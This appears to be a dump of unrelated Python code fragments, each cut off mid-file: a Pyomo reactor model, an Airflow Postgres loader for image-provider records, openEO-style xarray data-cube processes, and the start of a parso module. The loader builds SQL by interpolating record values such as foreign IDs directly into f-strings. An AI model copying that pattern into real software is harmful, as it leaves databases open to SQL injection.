*6*(1-b.eps)*b.hf[z,t]*(b.Tg[z,t]-1e3*b.Ts[z,t])
self.eq_d3 = Constraint(self.z, self.t, rule=rule_eq_d3,
doc = 'Gas-solid convective heat transfer flux')
# ^ specifies Tg_GS from gas/solid temps
def rule_eq_d4(b, z, t):
return b.Tg_GW[z,t]*b.Dr == b.hw[z,t]*(b.Tg[z,t] - b.Tw[z,t])*4
self.eq_d4 = Constraint(self.z, self.t, rule=rule_eq_d4,
doc = 'Gas-wall heat transfer flux')
# ^ specifies TgGW from gas/wall temps
def rule_eq_d5(b, z, t):
return b.Tg_refractory[z,t]*b.Dr == b.U[z,t]*(b.Tg[z,t] - b.Tw[z,t])*4
self.eq_d5 = Constraint(self.z, self.t, rule=rule_eq_d5,
doc = 'Heat flux through refractory')
# ^ specifies Tg_ref. from gas,wall temps...
def rule_eq_d6(b, z, t):
# shouldn't this be b.z.last()
if z == b.z.first():
return Constraint.Skip #The BC for Ts is under '_make_bdry_conds'
else:
return b.cont_param*(1-b.eps)*b.L*b.rho_sol*(b.cp_sol[z,t]*1e-3)*b.dTsdt[z,t] == \
b.dSh_fluxdz[z,t] \
+ b.Tg_GS[z,t]*b.L \
+ b.Ts_dHr[z,t]*b.L
self.eq_d6 = Constraint(self.z, self.t, rule=rule_eq_d6,
doc = 'Solid phase energy balance')
# ... 1e-3 factor is to convert cp_sol from J to kJ /kgK
def rule_eq_d7(b, z, t):
if z == b.z.first():
return Constraint.Skip
else:
return b.Ts_dHr[z,t] == b.tuning_param \
*(1-b.eps)*b.rho_sol \
*(-1e3*b.DH_rxn_s[z,t]) \
*(1e-3*b.r_gen[z,1,t])
self.eq_d7 = Constraint(self.z, self.t, rule=rule_eq_d7,
doc = 'Heat of reaction flux')
# ^ specifies TS_dHr
########################
def rule_eq_d8(b, z, t):
return 0 == b.Tw_GW[z,t] - b.Tw_Wamb[z,t]
self.eq_d8 = Constraint(self.z, self.t, rule=rule_eq_d8,
doc = 'Axial boundary condition for wall/ambient')
def rule_eq_d9(b, z, t):
return b.Tw_GW[z,t] == b.aw*b.hw[z,t]*(b.Tg[z,t]-b.Tw[z,t])
self.eq_d9= Constraint(self.z, self.t, rule=rule_eq_d9,
doc = 'Heat transfer from gas to wall')
def rule_eq_d10(b, z, t):
return b.Tw_Wamb[z,t] == b.aw1*b.Uw[z,t]*(b.Tw[z,t]-b.Tamb)
#/(b.rhow*b.Cpw)
self.eq_d10 = Constraint(self.z, self.t, rule=rule_eq_d10,
doc = 'Heat transfer from wall to ambient')
########################
# ^ these three constraints specify Tw_Wamb, Tw_GW, and Tw from Tg
def rule_eq_d11(b,z,t):
return b.Sh_flux[z,t] == 1e-3*b.qT[z,t]*b.cp_sol[z,t]*(1e-3*b.vs[t])*(1e3*b.Ts[z,t])
self.eq_d11 = Constraint(self.z, self.t, rule=rule_eq_d11,
doc = 'Solid phase enthalpy flux')
#==========================================================================
def _pressure_balance(self):
"""
Add the pressure balance constraints, Ergun equation.
"""
# Ideal Gas Law
def rule_eq_e1(b,z,t):
if z == 0:
return b.P[z,t] == b.Gas_In_P[t] #+ b.ErgunRHS
else:
return b.P[z,t] == b.CgT[z,t]*(b.R*1e-5)*b.Tg[z,t]
self.eq_e1 = Constraint(self.z, self.t, rule=rule_eq_e1,
doc = 'Pressure calculation from ideal gas law')
# ^ specify P from inlet and/or ideal law
# Pressure drop to superficial velocity correlation
def rule_eq_e2(b, z, t):
if b.press_drop == 'Ergun': # Ergun equation
if z == b.z.first():
return b.vg[z,t] == b.vg_in[t] # Inlet velocity
else:
return -b.dPdz[z,t]*1e5/150 == (((1e-3*b.mu_vap[z,t])
*(1-b.eps)**2*(b.vg[z,t] + (1e-3*b.vs[t]))
/(b.dp**2*b.eps**3))
+ 1/150*(1.75*b.rho_vap[z,t]*(1-b.eps)
*(b.vg[z,t] + (1e-3*b.vs[t]))*(b.vg[z,t] + (1e-3*b.vs[t]))
/(b.dp*b.eps**3)))*b.L
#################################################################
## make the assumption here that (vg+vs) > 0 to allow symbolic ##
## differentiation with simpy in the ##
## calculate_variable_from_constraint() function. ##
## This should be regarded as temporary, as I may want to ##
## simulate later a case with negative velocities. ##
## DO NOT FORGET ABOUT THIS!!! ##
#################################################################
##
##
##
##
##
##
##
##
#return -b.dPdz[z,t]*1e5 == ((150.0*b.mu_vap[z,t]
# *(1-b.eps)**2*(b.vg[z,t] + b.vs[t])
# /(b.dp**2*b.eps**3))
# + (1.75*b.rho_vap[z,t]*(1-b.eps)
# *abs(b.vg[z,t] + b.vs[t])*(b.vg[z,t] + b.vs[t])
# /(b.dp*b.eps**3)))*b.L
elif b.press_drop == 'SimplifiedP': # Mondino et al. (2017)
if z == b.z.first():
return b.vg[z,t] == b.vg_in[t] # Inlet velocity
else:
return -b.dPdz[z,t]*1e5 == (
(b.rho_sol - b.rho_vap[z,t])
*0.2*b.vg[z,t]*b.L)
else:
raise Exception('press_drop method not recognised.')
self.eq_e2 = Constraint(self.z, self.t, rule=rule_eq_e2,
doc = 'Pressure drop to superfical gas \
velocity correlation')
# ^ specifies dPdz
# Compute the minimum fluidized velocity
def rule_e3(b,z,t):
return ((1e-3*b.mu_vap[z,t])**2)*((1.75/(b.emf)**3)*(b.dp*b.umf[z,t]
*b.rho_vap[z,t]/(1e-3*b.mu_vap[z,t]))**2 \
+ (150*(1-b.emf)/(b.emf)**3)*(b.dp \
*b.umf[z,t]*b.rho_vap[z,t]/(1e-3*b.mu_vap[z,t]))) == \
b.dp**3*b.rho_vap[z,t] \
*(b.rho_sol-b.rho_vap[z,t])*b.g
self.eq_e3 = Constraint(self.z, self.t, rule=rule_e3,
doc = 'minimum fluidization velocity')
# ^ specifies the minimum fluidized velocity
# Store the difference between the minimum fluidization velocity and
# gas velocity, to use as either post-solve check or in optimization
def rule_eq_e4(b,z,t):
return b.v_diff[z,t] == b.umf[z,t] - b.vg[z,t]
self.eq_e4 = Constraint(self.z, self.t, rule=rule_eq_e4,
doc = 'Velocity post-check for moving \
bed operating regime')
# ^ specifies v_diff
#==========================================================================
def _make_bdry_conds(self):
"""
Boundary conditions for balance equations.
And inlet velocity of gas and solids.
"""
# all should be indexed by time
# BC for gas component mole balance
def rule_eq_f1(b,j,t):
return 1e2*b.G_flux[0,j,t]*b.A_bed \
== 1e2*b.Gas_In_F[t]*b.Gas_In_y[j,t]
self.eq_f1 = Constraint(self.GasList, self.t, rule=rule_eq_f1,
doc = 'Boundary condition for gas \
component mole balance')
# ^ specifies G_flux[0]
def rule_eq_f11(b,j,t):
return b.Gas_In_y[j,t] == b.y[0,j,t]
self.eq_f11 = Constraint(self.GasList, self.t, rule=rule_eq_f11,
doc = 'Direct specification of y at z=0')
# BC for solid components mass balance
def rule_eq_f2(b,j,t):
return 1e2*b.S_flux[1,j,t]*b.A_bed \
== 1e2*b.Solid_In_M[t]*b.Solid_In_x[j,t]
# Vbed = (1-eps)*Abed*L, but L=1 here because of scaling
self.eq_f2 = Constraint(self.SolidList, self.t, rule=rule_eq_f2,
doc = 'Boundary condition for solid \
component mass balance')
# ^ specifies S_flux[1]
# BC for gas phase energy balance
def | |
import logging
import json
from textwrap import dedent
from airflow.hooks.postgres_hook import PostgresHook
from util.loader import column_names as col
from util.loader import provider_details as prov
from psycopg2.errors import InvalidTextRepresentation
logger = logging.getLogger(__name__)
LOAD_TABLE_NAME_STUB = 'provider_image_data'
IMAGE_TABLE_NAME = 'image'
DB_USER_NAME = 'deploy'
NOW = 'NOW()'
FALSE = "'f'"
OLDEST_PER_PROVIDER = {
prov.FLICKR_DEFAULT_PROVIDER: '6 months 18 days',
prov.EUROPEANA_DEFAULT_PROVIDER: '3 months 9 days',
prov.WIKIMEDIA_DEFAULT_PROVIDER: '6 months 18 days',
prov.SMITHSONIAN_DEFAULT_PROVIDER: '8 days',
prov.BROOKLYN_DEFAULT_PROVIDER: '1 month 3 days',
prov.CLEVELAND_DEFAULT_PROVIDER: '1 month 3 days',
prov.VICTORIA_DEFAULT_PROVIDER: '1 month 3 days',
prov.NYPL_DEFAULT_PROVIDER: '1 month 3 days',
prov.RAWPIXEL_DEFAULT_PROVIDER: '1 month 3 days',
prov.SCIENCE_DEFAULT_PROVIDER: '1 month 3 days',
prov.STATENS_DEFAULT_PROVIDER: '1 month 3 days'
}
def create_loading_table(
postgres_conn_id,
identifier
):
"""
Create intermediary table and indices if they do not exist
"""
load_table = _get_load_table_name(identifier)
postgres = PostgresHook(postgres_conn_id=postgres_conn_id)
postgres.run(
dedent(
f'''
CREATE TABLE public.{load_table} (
{col.FOREIGN_ID} character varying(3000),
{col.LANDING_URL} character varying(1000),
{col.DIRECT_URL} character varying(3000),
{col.THUMBNAIL} character varying(3000),
{col.WIDTH} integer,
{col.HEIGHT} integer,
{col.FILESIZE} integer,
{col.LICENSE} character varying(50),
{col.LICENSE_VERSION} character varying(25),
{col.CREATOR} character varying(2000),
{col.CREATOR_URL} character varying(2000),
{col.TITLE} character varying(5000),
{col.META_DATA} jsonb,
{col.TAGS} jsonb,
{col.WATERMARKED} boolean,
{col.PROVIDER} character varying(80),
{col.SOURCE} character varying(80),
{col.INGESTION_TYPE} character varying(80)
);
'''
)
)
postgres.run(
f'ALTER TABLE public.{load_table} OWNER TO {DB_USER_NAME};'
)
postgres.run(
dedent(
f'''
CREATE INDEX IF NOT EXISTS {load_table}_{col.PROVIDER}_key
ON public.{load_table} USING btree ({col.PROVIDER});
'''
)
)
postgres.run(
dedent(
f'''
CREATE INDEX IF NOT EXISTS {load_table}_{col.FOREIGN_ID}_key
ON public.{load_table}
USING btree (provider, md5(({col.FOREIGN_ID})::text));
'''
)
)
postgres.run(
dedent(
f'''
CREATE INDEX IF NOT EXISTS {load_table}_{col.DIRECT_URL}_key
ON public.{load_table}
USING btree (provider, md5(({col.DIRECT_URL})::text));
'''
)
)
def load_local_data_to_intermediate_table(
postgres_conn_id,
tsv_file_name,
identifier,
max_rows_to_skip=10
):
load_table = _get_load_table_name(identifier)
logger.info(f'Loading {tsv_file_name} into {load_table}')
postgres = PostgresHook(postgres_conn_id=postgres_conn_id)
load_successful = False
while not load_successful and max_rows_to_skip >= 0:
try:
postgres.bulk_load(f'{load_table}', tsv_file_name)
load_successful = True
except InvalidTextRepresentation as e:
line_number = _get_malformed_row_in_file(str(e))
_delete_malformed_row_in_file(tsv_file_name, line_number)
finally:
max_rows_to_skip = max_rows_to_skip - 1
if not load_successful:
raise InvalidTextRepresentation(
'Exceeded the maximum number of allowed defective rows')
_clean_intermediate_table_data(postgres, load_table)
def load_s3_data_to_intermediate_table(
postgres_conn_id,
bucket,
s3_key,
identifier
):
load_table = _get_load_table_name(identifier)
logger.info(f'Loading {s3_key} from S3 Bucket {bucket} into {load_table}')
postgres = PostgresHook(postgres_conn_id=postgres_conn_id)
postgres.run(
dedent(
f"""
SELECT aws_s3.table_import_from_s3(
'{load_table}',
'',
'DELIMITER E''\t''',
'{bucket}',
'{s3_key}',
'us-east-1'
);
"""
)
)
_clean_intermediate_table_data(postgres, load_table)
def _clean_intermediate_table_data(
postgres_hook,
load_table
):
postgres_hook.run(
f'DELETE FROM {load_table} WHERE {col.DIRECT_URL} IS NULL;'
)
postgres_hook.run(
f'DELETE FROM {load_table} WHERE {col.LICENSE} IS NULL;'
)
postgres_hook.run(
f'DELETE FROM {load_table} WHERE {col.LANDING_URL} IS NULL;'
)
postgres_hook.run(
f'DELETE FROM {load_table} WHERE {col.FOREIGN_ID} IS NULL;'
)
postgres_hook.run(
dedent(
f'''
DELETE FROM {load_table} p1
USING {load_table} p2
WHERE
p1.ctid < p2.ctid
AND p1.{col.PROVIDER} = p2.{col.PROVIDER}
AND p1.{col.FOREIGN_ID} = p2.{col.FOREIGN_ID};
'''
)
)
def upsert_records_to_image_table(
postgres_conn_id,
identifier,
image_table=IMAGE_TABLE_NAME
):
def _newest_non_null(column):
return f'{column} = COALESCE(EXCLUDED.{column}, old.{column})'
def _merge_jsonb_objects(column):
"""
This function returns SQL that merges the top-level keys of the
a JSONB column, taking the newest available non-null value.
"""
return f'''{column} = COALESCE(
jsonb_strip_nulls(old.{column})
|| jsonb_strip_nulls(EXCLUDED.{column}),
EXCLUDED.{column},
old.{column}
)'''
def _merge_jsonb_arrays(column):
return f'''{column} = COALESCE(
(
SELECT jsonb_agg(DISTINCT x)
FROM jsonb_array_elements(old.{column} || EXCLUDED.{column}) t(x)
),
EXCLUDED.{column},
old.{column}
)'''
load_table = _get_load_table_name(identifier)
logger.info(f'Upserting new records into {image_table}.')
postgres = PostgresHook(postgres_conn_id=postgres_conn_id)
column_inserts = {
col.CREATED_ON: NOW,
col.UPDATED_ON: NOW,
col.INGESTION_TYPE: col.INGESTION_TYPE,
col.PROVIDER: col.PROVIDER,
col.SOURCE: col.SOURCE,
col.FOREIGN_ID: col.FOREIGN_ID,
col.LANDING_URL: col.LANDING_URL,
col.DIRECT_URL: col.DIRECT_URL,
col.THUMBNAIL: col.THUMBNAIL,
col.WIDTH: col.WIDTH,
col.HEIGHT: col.HEIGHT,
col.FILESIZE: col.FILESIZE,
col.LICENSE: col.LICENSE,
col.LICENSE_VERSION: col.LICENSE_VERSION,
col.CREATOR: col.CREATOR,
col.CREATOR_URL: col.CREATOR_URL,
col.TITLE: col.TITLE,
col.LAST_SYNCED: NOW,
col.REMOVED: FALSE,
col.META_DATA: col.META_DATA,
col.TAGS: col.TAGS,
col.WATERMARKED: col.WATERMARKED
}
upsert_query = dedent(
f'''
INSERT INTO {image_table} AS old ({', '.join(column_inserts.keys())})
SELECT {', '.join(column_inserts.values())}
FROM {load_table}
ON CONFLICT ({col.PROVIDER}, md5({col.FOREIGN_ID}))
DO UPDATE SET
{col.UPDATED_ON} = {NOW},
{col.LAST_SYNCED} = {NOW},
{col.REMOVED} = {FALSE},
{_newest_non_null(col.INGESTION_TYPE)},
{_newest_non_null(col.SOURCE)},
{_newest_non_null(col.LANDING_URL)},
{_newest_non_null(col.DIRECT_URL)},
{_newest_non_null(col.THUMBNAIL)},
{_newest_non_null(col.WIDTH)},
{_newest_non_null(col.HEIGHT)},
{_newest_non_null(col.FILESIZE)},
{_newest_non_null(col.LICENSE)},
{_newest_non_null(col.LICENSE_VERSION)},
{_newest_non_null(col.CREATOR)},
{_newest_non_null(col.CREATOR_URL)},
{_newest_non_null(col.TITLE)},
{_newest_non_null(col.WATERMARKED)},
{_merge_jsonb_objects(col.META_DATA)},
{_merge_jsonb_arrays(col.TAGS)}
'''
)
postgres.run(upsert_query)
def overwrite_records_in_image_table(
postgres_conn_id,
identifier,
image_table=IMAGE_TABLE_NAME
):
load_table = _get_load_table_name(identifier)
logger.info(f'Updating records in {image_table}.')
postgres = PostgresHook(postgres_conn_id=postgres_conn_id)
columns_to_update = [
col.LANDING_URL,
col.DIRECT_URL,
col.THUMBNAIL,
col.WIDTH,
col.HEIGHT,
col.FILESIZE,
col.LICENSE,
col.LICENSE_VERSION,
col.CREATOR,
col.CREATOR_URL,
col.TITLE,
col.META_DATA,
col.TAGS,
col.WATERMARKED,
]
update_set_string = ',\n'.join(
[f'{column} = {load_table}.{column}' for column in columns_to_update]
)
update_query = dedent(
f'''
UPDATE {image_table}
SET
{update_set_string}
FROM {load_table}
WHERE
{image_table}.{col.PROVIDER} = {load_table}.{col.PROVIDER}
AND
md5({image_table}.{col.FOREIGN_ID})
= md5({load_table}.{col.FOREIGN_ID});
'''
)
postgres.run(update_query)
def drop_load_table(postgres_conn_id, identifier):
load_table = _get_load_table_name(identifier)
postgres = PostgresHook(postgres_conn_id=postgres_conn_id)
postgres.run(f'DROP TABLE {load_table};')
def _get_load_table_name(
identifier,
load_table_name_stub=LOAD_TABLE_NAME_STUB,
):
return f'{load_table_name_stub}{identifier}'
def _get_malformed_row_in_file(error_msg):
error_list = error_msg.splitlines()
copy_error = next(
(line for line in error_list if line.startswith('COPY')), None
)
assert copy_error is not None
line_number = int(copy_error.split('line ')[1].split(',')[0])
return line_number
def _delete_malformed_row_in_file(tsv_file_name, line_number):
with open(tsv_file_name, "r") as read_obj:
lines = read_obj.readlines()
with open(tsv_file_name, "w") as write_obj:
for index, line in enumerate(lines):
if index + 1 != line_number:
write_obj.write(line)
def _create_temp_flickr_sub_prov_table(
postgres_conn_id,
temp_table='temp_flickr_sub_prov_table'
):
"""
Drop the temporary table if it already exists
"""
postgres = PostgresHook(postgres_conn_id=postgres_conn_id)
postgres.run(f'DROP TABLE IF EXISTS public.{temp_table};')
"""
Create intermediary table for sub provider migration
"""
postgres.run(
dedent(
f'''
CREATE TABLE public.{temp_table} (
{col.CREATOR_URL} character varying(2000),
sub_provider character varying(80)
);
'''
)
)
postgres.run(
f'ALTER TABLE public.{temp_table} OWNER TO {DB_USER_NAME};'
)
"""
Populate the intermediary table with the sub providers of interest
"""
for sub_prov, user_id_set in prov.FLICKR_SUB_PROVIDERS.items():
for user_id in user_id_set:
creator_url = prov.FLICKR_PHOTO_URL_BASE + user_id
postgres.run(
dedent(
f'''
INSERT INTO public.{temp_table} (
{col.CREATOR_URL},
sub_provider
)
VALUES (
'{creator_url}',
'{sub_prov}'
);
'''
)
)
return temp_table
def update_flickr_sub_providers(
postgres_conn_id,
image_table=IMAGE_TABLE_NAME,
default_provider=prov.FLICKR_DEFAULT_PROVIDER,
):
postgres = PostgresHook(postgres_conn_id=postgres_conn_id)
temp_table = _create_temp_flickr_sub_prov_table(postgres_conn_id)
select_query = dedent(
f'''
SELECT
{col.FOREIGN_ID} AS foreign_id,
public.{temp_table}.sub_provider AS sub_provider
FROM {image_table}
INNER JOIN public.{temp_table}
ON
{image_table}.{col.CREATOR_URL} = public.{temp_table}.{
col.CREATOR_URL}
AND
{image_table}.{col.PROVIDER} = '{default_provider}';
'''
)
selected_records = postgres.get_records(select_query)
logger.info(f'Updating {len(selected_records)} records')
for row in selected_records:
foreign_id = row[0]
sub_provider = row[1]
postgres.run(
dedent(
f'''
UPDATE {image_table}
SET {col.SOURCE} = '{sub_provider}'
WHERE
{image_table}.{col.PROVIDER} = '{default_provider}'
AND
MD5({image_table}.{col.FOREIGN_ID}) = MD5('{foreign_id}');
'''
)
)
"""
Drop the temporary table
"""
postgres.run(f'DROP TABLE public.{temp_table};')
def _create_temp_europeana_sub_prov_table(
postgres_conn_id,
temp_table='temp_eur_sub_prov_table'
):
"""
Drop the temporary table if it already exists
"""
postgres = PostgresHook(postgres_conn_id=postgres_conn_id)
postgres.run(f'DROP TABLE IF EXISTS public.{temp_table};')
"""
Create intermediary table for sub provider migration
"""
postgres.run(
dedent(
f'''
CREATE TABLE public.{temp_table} (
data_provider character varying(120),
sub_provider character varying(80)
);
'''
)
)
postgres.run(
f'ALTER TABLE public.{temp_table} OWNER TO {DB_USER_NAME};'
)
"""
Populate the intermediary table with the sub providers of interest
"""
for sub_prov, data_provider in prov.EUROPEANA_SUB_PROVIDERS.items():
postgres.run(
dedent(
f'''
INSERT INTO public.{temp_table} (
data_provider,
sub_provider
)
VALUES (
'{data_provider}',
'{sub_prov}'
);
'''
)
)
return temp_table
def update_europeana_sub_providers(
postgres_conn_id,
image_table=IMAGE_TABLE_NAME,
default_provider=prov.EUROPEANA_DEFAULT_PROVIDER,
sub_providers=prov.EUROPEANA_SUB_PROVIDERS
):
postgres = PostgresHook(postgres_conn_id=postgres_conn_id)
temp_table = _create_temp_europeana_sub_prov_table(postgres_conn_id)
select_query = dedent(
f'''
SELECT L.foreign_id, L.data_providers, R.sub_provider
FROM(
SELECT
{col.FOREIGN_ID} AS foreign_id,
{col.META_DATA} ->> 'dataProvider' AS data_providers,
{col.META_DATA}
FROM {image_table}
WHERE {col.PROVIDER} = '{default_provider}'
) L INNER JOIN
{temp_table} R ON
L.{col.META_DATA} ->'dataProvider' ? R.data_provider;
'''
)
selected_records = postgres.get_records(select_query)
"""
Update each selected row if it corresponds to only one sub-provider.
Otherwise an exception is thrown
"""
for row in selected_records:
foreign_id = row[0]
data_providers = json.loads(row[1])
sub_provider = row[2]
eligible_sub_providers = {s for s in sub_providers if sub_providers[s]
in data_providers}
if len(eligible_sub_providers) > 1:
raise Exception(f"More than one sub-provider identified for the "
f"image with foreign ID {foreign_id}")
assert len(eligible_sub_providers) == 1
assert eligible_sub_providers.pop() == sub_provider
postgres.run(
dedent(
f'''
UPDATE {image_table}
SET {col.SOURCE} = '{sub_provider}'
WHERE
{image_table}.{col.PROVIDER} = '{default_provider}'
AND
MD5({image_table}.{col.FOREIGN_ID}) = MD5('{foreign_id}');
'''
)
)
"""
Drop the temporary table
"""
postgres.run(f'DROP TABLE public.{temp_table};')
def update_smithsonian_sub_providers(
postgres_conn_id,
image_table=IMAGE_TABLE_NAME,
default_provider=prov.SMITHSONIAN_DEFAULT_PROVIDER,
sub_providers=prov.SMITHSONIAN_SUB_PROVIDERS
):
postgres = PostgresHook(postgres_conn_id=postgres_conn_id)
"""
Select all records where the source value is not yet updated
"""
select_query = dedent(
f'''
SELECT {col.FOREIGN_ID},
{col.META_DATA} ->> 'unit_code' AS unit_code
FROM {image_table}
WHERE
{col.PROVIDER} = '{default_provider}'
AND
{col.SOURCE} = '{default_provider}';
'''
)
selected_records = postgres.get_records(select_query)
"""
Set the source value of each selected row to the sub-provider value
corresponding to unit code. If the unit code is unknown, an error is thrown
"""
for row in selected_records:
foreign_id = row[0]
unit_code = row[1]
source = next((s for s in sub_providers if unit_code in
sub_providers[s]), None)
if source is None:
raise Exception(
f"An unknown unit code value {unit_code} encountered ")
postgres.run(
dedent(
f'''
UPDATE {image_table}
SET {col.SOURCE} = '{source}'
WHERE
{image_table}.{col.PROVIDER} = '{default_provider}'
AND
MD5({image_table}.{col.FOREIGN_ID}) = MD5('{foreign_id}');
'''
)
)
def expire_old_images(
postgres_conn_id,
provider,
image_table=IMAGE_TABLE_NAME
):
postgres = PostgresHook(postgres_conn_id=postgres_conn_id)
if provider not in OLDEST_PER_PROVIDER:
raise Exception(
f"Provider value {provider} not defined in the "
f"OLDEST_PER_PROVIDER dictionary")
"""
| |
implementations inside
`resample_cube_spatial`.
Returns
-------
save_result :
Class instance implementing 'resample_cube_spatial' process.
"""
return ResampleCubeSpatial()
class ResampleCubeSpatial:
"""
Class implementing 'resample_cube_spatial' processe.
"""
@staticmethod
def exec_xar(data, target, method, options={}):
"""
Save data to disk in specified format.
Parameters
----------
data : xr.DataArray
A data cube.
target: str,
A data cube that describes the spatial target resolution.
method: str,
Resampling method. Methods are inspired by GDAL, see [gdalwarp](https://www.gdal.org/gdalwarp.html) for more information.
"near","bilinear","cubic","cubicspline","lanczos","average","mode","max","min","med","q1","q3"
(default: near)
"""
try:
methods_list = ["near","bilinear","cubic","cubicspline","lanczos","average","mode","max","min","med","q1","q3"]
if method is None or method == 'near':
method = 'nearest'
elif method not in methods_list:
raise Exception(f"Selected resampling method \"{method}\" is not available! Please select one of "
f"[{', '.join(methods_list)}]")
return odc.algo._warp.xr_reproject(data,target.geobox,resampling=method)
except Exception as e:
raise e
###############################################################################
# Resample cube temporal process
###############################################################################
@process
def resample_cube_temporal():
"""
Returns class instance of `resample_cube_temporal`.
For more details, please have a look at the implementations inside
`resample_cube_temporal`.
Returns
-------
save_result :
Class instance implementing 'resample_cube_temporal' process.
"""
return ResampleCubeTemporal()
class ResampleCubeTemporal:
"""
Class implementing 'resample_cube_temporal' process.
"""
@staticmethod
def exec_xar(data, target, dimension = None, valid_within = None):
"""
Resamples one or more given temporal dimensions from a source data cube to align with the corresponding dimensions of the given target data cube using the nearest neighbor method.
Returns a new data cube with the resampled dimensions. By default, this process simply takes the nearest neighbor independent of the value (including values such as no-data / null).
Depending on the data cubes this may lead to values being assigned to two target timestamps.
To only consider valid values in a specific range around the target timestamps, use the parameter valid_within.
The rare case of ties is resolved by choosing the earlier timestamps.
Parameters
----------
data : xr.DataArray
A data cube.
target : str,
A data cube that describes the temporal target resolution.
dimension : str, null
The name of the temporal dimension to resample, which must exist with this name in both data cubes.
If the dimension is not set or is set to null, the process resamples all temporal dimensions that exist with the same names in both data cubes.
The following exceptions may occur:
A dimension is given, but it does not exist in any of the data cubes: DimensionNotAvailable
A dimension is given, but one of them is not temporal: DimensionMismatch
No specific dimension name is given and there are no temporal dimensions with the same name in the data: DimensionMismatch
valid_within : number, null
Setting this parameter to a numerical value enables that the process searches for valid values within the given period of days before and after the target timestamps.
Valid values are determined based on the function is_valid.
For example, the limit of 7 for the target timestamps 2020-01-15 12:00:00 looks for a nearest neighbor after 2020-01-08 12:00:00 and before 2020-01-22 12:00:00.
If no valid value is found within the given period, the value will be set to no-data (null).
"""
if dimension is None:
dimension = 'time'
if dimension in ['time', 't', 'times']: # time dimension must be converted into values
dimension = get_time_dimension_from_data(data, dimension)
else:
raise Exception('DimensionNotAvailable')
if len(data[dimension].values) >= len(target[dimension].values):
index = np.array([])
for d in data[dimension].values:
difference = (np.abs(d - target[dimension].values))
nearest = np.argwhere(difference == np.min(difference))
index = np.append(index, nearest)
t = []
for i in index:
t.append(target[dimension].values[int(i)])
filter_values = data[dimension].values
new_data = data #ATTENTION new_data is a shallow copy of data! When you change new_data also data is changed.
new_data[dimension] = t
else:
index = []
for d in target[dimension].values:
difference = (np.abs(d - data[dimension].values))
nearest = np.argwhere(difference == np.min(difference))
index.append(int(nearest))
data_t = data.transpose(dimension, ...)
new_data = data_t[index]
new_data = new_data.transpose(*data.dims)
filter_values = new_data[dimension].values
new_data[dimension] = target[dimension].values
if valid_within is None:
new_data = new_data
else:
minimum = np.timedelta64(valid_within, 'D')
filter = (np.abs(filter_values - new_data[dimension].values) <= minimum)
new_data_t = new_data.transpose(dimension, ...)
new_data_t = new_data_t[filter]
new_data = new_data_t.transpose(*new_data.dims)
new_data.attrs = data.attrs
return new_data
###############################################################################
# CreateRasterCube process
###############################################################################
@process
def create_raster_cube():
"""
Create an empty raster data cube.
Returns
-------
data cube :
Creates a new raster data cube without dimensions. Dimensions can be added with add_dimension.
"""
return CreateRasterCube()
class CreateRasterCube:
"""
Creates a new raster data cube without dimensions. Dimensions can be added with add_dimension.
"""
@staticmethod
def exec_num():
"""
Parameters
----------
This process has no parameters.
Returns
-------
xr.DataArray :
An empty raster data cube with zero dimensions.
"""
return xr.DataArray([])
###############################################################################
# AddDimension process
###############################################################################
@process
def add_dimension():
"""
Adds a new named dimension to the data cube.
Returns
-------
data cube :
The data cube with a newly added dimension. The new dimension has exactly one dimension label.
All other dimensions remain unchanged.
"""
return AddDimension()
class AddDimension:
"""
Adds a new named dimension to the data cube.
Afterwards, the dimension can be referred to with the specified name.
If a dimension with the specified name exists, the process fails with a DimensionExists exception.
The dimension label of the dimension is set to the specified label.
"""
@staticmethod
def exec_xar(data, name, labels, type = 'other'):
"""
Parameters
----------
data : xr.DataArray
A data cube to add the dimension to.
name : str
Name for the dimension.
labels : number, str
A dimension label.
type : str, optional
The type of dimension, defaults to other.
Returns
-------
xr.DataArray :
The data cube with a newly added dimension. The new dimension has exactly one dimension label.
All other dimensions remain unchanged.
"""
data_e = data.assign_coords(placeholder = labels)
data_e = data_e.expand_dims('placeholder')
data_e = data_e.rename({'placeholder' : name})
return data_e
###############################################################################
# DimensionLabels process
###############################################################################
@process
def dimension_labels():
"""
Get the dimension labels.
Returns
-------
Array :
The labels as an array.
"""
return DimensionLabels()
class DimensionLabels:
"""
Gives all labels for a dimension in the data cube. The labels have the same order as in the data cube.
If a dimension with the specified name does not exist, the process fails with a DimensionNotAvailable exception.
"""
@staticmethod
def exec_xar(data, dimension):
"""
Parameters
----------
data : xr.DataArray
A data cube to add the dimension to.
dimension : str
The name of the dimension to get the labels for.
Returns
-------
np.array :
The labels as an array.
"""
if dimension in ['time', 't', 'times']: # time dimension must be converted into values
dimension = get_time_dimension_from_data(data, dimension)
return data[dimension].values
elif dimension in data.dims:
return data[dimension].values
else:
raise Exception('DimensionNotAvailable')
###############################################################################
# DropDimension process
###############################################################################
@process
def drop_dimension():
"""
Remove a dimension.
Returns
-------
xr.DataArray :
A data cube without the specified dimension.
"""
return DropDimension()
class DropDimension:
"""
Drops a dimension from the data cube.
Dropping a dimension only works on dimensions with a single dimension label left,
otherwise the process fails with a DimensionLabelCountMismatch exception.
Dimension values can be reduced to a single value with a filter such as filter_bands or the reduce_dimension process.
If a dimension with the specified name does not exist, the process fails with a DimensionNotAvailable exception.
"""
@staticmethod
def exec_xar(data, name):
"""
Parameters
----------
data : xr.DataArray
The data cube to drop a dimension from.
name : str
Name of the dimension to drop.
Returns
-------
xr.DataArray :
A data cube without the specified dimension.
The number of dimensions decreases by one, but the dimension properties
(name, type, labels, reference system and resolution) for all other dimensions remain unchanged.
"""
if name in data.dims:
if len(data[name].values) == 1:
dropped = data.squeeze(name, drop=True)
return dropped
else:
raise Exception('DimensionLabelCountMismatch')
else:
raise Exception('DimensionNotAvailable')
###############################################################################
# RenameDimension process
###############################################################################
@process
def rename_dimension():
"""
Rename a dimension.
Returns
-------
xr.DataArray :
A data cube with the same dimensions, but the name of one of the dimensions changes.
The old name can not be referred to any longer.
The dimension properties (name, type, labels, reference system and resolution) remain unchanged.
"""
return RenameDimension()
class RenameDimension:
"""
Renames a dimension in the data cube while preserving all other properties.
"""
@staticmethod
def exec_xar(data, source, target):
"""
Parameters
----------
data : xr.DataArray
A data cube.
source : str
The current name of the dimension.
Fails | |
<gh_stars>100-1000
# -*- coding: utf-8 -*-
import codecs
import warnings
import re
from contextlib import contextmanager
from parso.normalizer import Normalizer, NormalizerConfig, Issue, Rule
from parso.python.tree import search_ancestor
from parso.parser import ParserSyntaxError
_BLOCK_STMTS = ('if_stmt', 'while_stmt', 'for_stmt', 'try_stmt', 'with_stmt')
_STAR_EXPR_PARENTS = ('testlist_star_expr', 'testlist_comp', 'exprlist')
# This is the maximal block size given by python.
